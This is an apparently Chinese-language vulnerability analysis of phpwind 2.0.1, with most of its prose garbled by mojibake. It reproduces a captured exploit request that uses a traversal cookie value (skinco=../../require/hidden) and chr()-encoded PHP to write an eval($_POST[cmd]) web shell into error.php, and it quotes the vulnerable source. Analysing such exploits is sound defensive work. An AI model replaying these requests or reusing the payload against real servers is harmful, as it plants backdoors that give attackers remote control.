分析phpwind2.0.1漏洞

ããç«ç«ä¼ ç»æä¸ä¸ªphpwind2.0.1æ¼æ´å©ç¨ç¨åºï¼å¯ä»¥ç´æ¥å¨ç®å½ä¸­åå¥ä¸ä¸ªæ¨é©¬ãæä¹è¯´å¢ï¼è¿ä¸ªæ¼æ´æ¯pinkeyesåç°çï¼æ¬ææ¨å¨åæè¿ä¸ªæ¼æ´çæè·¯ãç´å°åç°è¿ä¸ªæ¼æ´æ¯æä¹äº§ççï¼æè¿å¨åèæ±ä¸­ï¼åæ¶pinkeyes çç¿æºæ·±æ·±çæå¨äºæï¼åæ¥æææç½ä»ä¹ææ¯çæ­£çææ¯å«éãä¸å¬ææ¢æ¢éæ¥ï¼

ããå¨ç¨åºè¿è¡æ¶ï¼ææäºä¸ä¸ªåï¼

ããGET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=

ãã(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),

ããchr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).

ããchr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1

ããContent-Type: text/html

ããCookie:skinco=../../require/hidden;

ããHost: www.5a609.com:81

ããAccept: text/html, */*

ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)

ããGET /phpwind//attachment/set.php HTTP/1.1

ããContent-Type: text/html

ããCookie:skinco=../../require/hidden;

ããHost: www.5a609.com:81

ããAccept: text/html, */*

ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)

ããChr()éçé£äºä¸è¥¿ææ¥äºä¸ä¸asciiå­ç¬¦è¡¨ï¼å¾å°çæ¯è¿æ ·çï¼

ãã?>

ããå¾æ¾ç¶æ¯å¨error.phpéåå¥ä¸è¡phpæ¨é©¬ï¼ ã

ããæ以å³é®æ¯ï¼

ããGET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=中$D_nameå$tidwtçåºå¤ãè¿ä¸¤ä¸ªä¸è¥¿å¾éè¦!äºæ¯æä¸äºä¸ä¸ªphpwind 2.0.1çç¨åºççï¼å¼å§ä»¥ä¸ºæ¯job.phpæé®é¢ãè¿å¥job.php中ï¼åªåç°å¦ä¸ä»£ç ï¼

ããelseif($previewjob=='preview'){

ããrequire_once(R_P.'require/bbscode.php');

ããrequire_once(R_P.'header.php');

ããif (empty($skin)) $skin=$db_defaultstyle;

ããif (file_exists(R_P."data/style/$skin.php")){

ããinclude_once("data/style/$skin.php");

ãã}

ãã好ï¼å¨å¤±æçåæ¶ä¹åç°äº$skinä¸å®æé®é¢ï¼job.phpæ件头æ个ï¼require_once("./global.php");

ããæ¥çæ们æ¥ççglobal.phpéé¢ç$skinåæ°å§ï¼

ããif ($db_refreshtime!=0){

ããif('C:'.$REQUEST_URI==$lastpath && $onbbstime<$db_refreshtime){

ãã!$_COOKIE['winduid'] && $groupid='guest';

ãã$skin=$skinco ? $skinco : $db_defaultstyle;

ããShowmsg("refresh_limit");

ãã}

ããå¦ï¼åªè¦æ们å®ä¹äº$skincoå°±å¯ä»¥æ»¡è¶³$skinäº!æ以åæ¾æ¾$skincoå§ï¼$skincoåªæä¸å¤è§£éï¼å¶åï¼å¹¶æ²¡æåä»»ä½è¿æ»¤ï¼

ããif($skinco && file_exists(R_P."data/style/$skinco.php")){

ããCookie('skinco',$skinco);

ããååï¼å¥½è½»æ¾ï¼åªè¦å­å¨å°±å¯ä»¥?è¿æ ·åªè¦æé ä¸ä¸ªcookieå°±å®å¨å¯ä»¥å®ç°ãå¦?$skincoæ们好象åªéè§è¿ãæç¶ï¼å°±æ¯ä¸é¢æçåéé¢çï¼

ããCookie:skinco=../../require/hidden;

ããè¿æ ·å°±æ´å è¯ææçæè·¯æ¯æ­£ç¡®çï¼é£å路转åãåä¸å¾ä¸ä½©æè¿æ ·ç²¾å½©çææ³ï¼æç§pinkeyesçæè·¯ï¼æé ååºè¯¥æ¯è¿æ ·çï¼

ããdata/style/../../require/hidden.php

ããä¹å°±æ¯./require/hidden.phpã

ããè¿æ ·ä¹å°±æ¯æ»¡è¶³äºjob.php中ç

ããif (file_exists(R_P."data/style/$skin.php")){

ããinclude_once("data/style/$skin.php");

ããå°è¿éï¼ååä¸æ®µè½ï¼æ们å个头æ³æ³ãæ们åæè¿ä¹å¤å°±æ¯pinkeyesè¦ä¸ºäºåå«ä¸ä¸ªæ件ï¼./require/hidden.phpãè¿å°±å¥æªäºï¼ä¸ºä»ä¹è¿ä¹pinkeyesè¦åæ¹ç¾è®¡çæ¥åå« ./require/hidden.phpå¢?ç´æ¥å©ç¨ä¸å¯ä»¥å?è¿ä¸ªhidden.phpå°åºæ¯ä¸ªä»ä¹æ ·çæ件å¢?æ©ï¼ä¸é¢ç解éä¼è®©ä½ æä¸ä¸ªæ»¡æçç­æ¡ã

ããæå°å¿ç¿¼ç¿¼çæå¼hidden.php

ãã

ãã!function_exists('readover') && exit('Forbidden');

ãã$newonline="<>t$timestampt$onlineipt$fidwtt$tidwtt$groupidt$wherebbsyout$acttimet$uidt$windidt";

ãã$newonline=str_pad($newonline,$db_olsize)."n";

ãã$onlineuser=readover(R_P.$D_name);

ããif($offset=strpos($onlineuser,"t".$windid."t")){

ãã$inselectfile='N';

ãã$offset=strpos($onlineuser,"n",$offset-$db_olsize);$offset+=1;/*ä¼ååä¸å¨å¼å§éè¦è½¬æ¢æé*/

ããwriteinline(R_P.$D_name,$newonline,$offset);

ãã}elseif($offset=strpos($onlineuser,str_pad(' ',$db_olsize)."n")){

ããwriteinline(R_P.$D_name,$newonline,$offset);

ãã}else{

ããwriteover(R_P.$D_name,$newonline,"ab");

ãã}

ãã?>

ããçå°è¿éï¼ææççå¢é½è§£å¼äº!

ãã1.åæ¥æ件头å¤äºä¸ª

ãã!function_exists('readover') && exit('Forbidden');

ããè¿æ ·ç´æ¥è®¿é®æ¯ä¸å许çï¼åé¢ç代ç ä¹ä¸ä¼æ§è¡ï¼è¿æ ·ææç½pinkeyesçè¦å¿å¤èµ°å¼¯è·¯æ¥åªåç¨includeæ¥åå«è¿ä¸ªæ件

ãã2 è¿ä¸ªæ件éæwriteline()æ¯å¯ä»¥åå¥æ¨é©¬çã$newonline正好ä¹å®ä¹äº$tidwtï¼æ以æåçwriteline()æ$tidwtä¹åè¿å»äºã

ããåå¥å°äºd_name æå®ä¹çset.phpè¿ä¸ªä¸´æ¶æ件éãæ¬æ¥è¿æ ·å°±å¯ä»¥åå¥ä¸ä¸ªå°æ¨é©¬äºï¼åªè¦ä½¿$tidwt为ç¼ç ï¼å°±å¯ä»¥çãä½æ¯å¯è½æ¯pinkeyesèèå°set.phpéçä¸è¥¿æ¯è¾ä¹±ãæ以çè´¹è¦å¿çç¨

ãã?>

ããåå¥ä¸ä¸ªæ´ç®åçæ¨é©¬å°error.phpé!è¿æ ·æå¤äºæ们æç第äºä¸ªåï¼

ããGET /phpwind//attachment/set.php HTTP/1.1

ããããããããããã

ããåè®°ï¼ææè§èªå·±å侦æ¢å°è¯´è¿ä¸éï¼ææ¯åï¼åãããã

ï¼æ¬æç±è´£ä»»ç¼è¾ pasu  æ´çåå¸ï¼